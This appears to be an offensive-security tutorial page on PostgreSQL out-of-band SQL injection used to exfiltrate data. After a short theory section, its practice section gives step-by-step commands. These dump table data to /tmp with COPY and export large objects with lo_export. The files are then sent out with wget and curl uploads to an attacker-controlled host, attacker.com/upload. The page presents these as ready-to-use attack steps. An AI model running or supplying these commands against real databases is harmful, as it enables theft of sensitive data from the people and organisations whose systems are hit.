PostgreSQL Out of Band

Context

In this article, we will explore how to exploit PostgreSQL Out of Band SQL Injection for data exfiltration. This offensive technique involves leveraging the PostgreSQL database's ability to communicate with external systems to extract data through non-standard communication channels. Readers should have an understanding of SQL queries, database interactions, and HTTP requests.

Theory

Out of Band SQL Injection in PostgreSQL

Out of Band SQL Injection is an advanced technique that uses external communication paths to extract data from a database. Unlike traditional SQL Injection methods, which rely on the database's direct responses, Out of Band Injection exploits the ability of the database to interact with other systems, such as web servers or DNS, to exfiltrate data.

COPY Command Usage

The COPY command in PostgreSQL is used to transfer data between a file and a table. This functionality can be misused to exfiltrate data stored in the database by writing it to a file that is accessible externally. Attackers can then download this file containing sensitive data.

lo_export Functionality

lo_export is a PostgreSQL function used to export large objects to a file. By leveraging this function, attackers can write large object data to a file for exfiltration. This method is particularly useful for exporting large data sets that cannot be easily extracted through conventional SQL Injection.

Out of Band Communication Mechanisms

Out of Band data exfiltration involves utilizing network protocols to send data from the database to a remote, attacker-controlled server. This can be done by triggering the database to make HTTP or DNS requests containing the data intended for extraction.

Practice

Exfiltrate Data Using COPY Command

To exfiltrate data using the COPY command, follow these steps:

  • Write the selected data to a file on the server:

    COPY (SELECT column FROM table) TO '/tmp/exfiltrated_data.csv';

  • Send the file to an attacker-controlled server using wget:

    wget http://attacker.com/upload --post-file=/tmp/exfiltrated_data.csv

The outcome of this technique is that data from the PostgreSQL database is written to a file on the server and then sent to an external server controlled by the attacker.

Exfiltrate Data Using lo_export

To exfiltrate data using lo_export, use the following steps:

  • Export large object data to a file:

    SELECT lo_export(oid, '/tmp/exfiltrated_data.bin') FROM pg_largeobject;

  • Upload the file to an attacker-controlled server using curl:

    curl -X POST -F 'file=@/tmp/exfiltrated_data.bin' http://attacker.com/upload

The outcome of this technique is that large object data from the PostgreSQL database is exfiltrated to a file, which is then uploaded to an external server controlled by an attacker.

Tools

  • wget
  • curl

These tools are used to send data from the server where PostgreSQL is running to an attacker-controlled endpoint. They are essential for the execution of the exploitation techniques described above.

We use cookies

We use cookies to ensure you get the best experience on our website. For more information on how we use cookies, please see our cookie policy.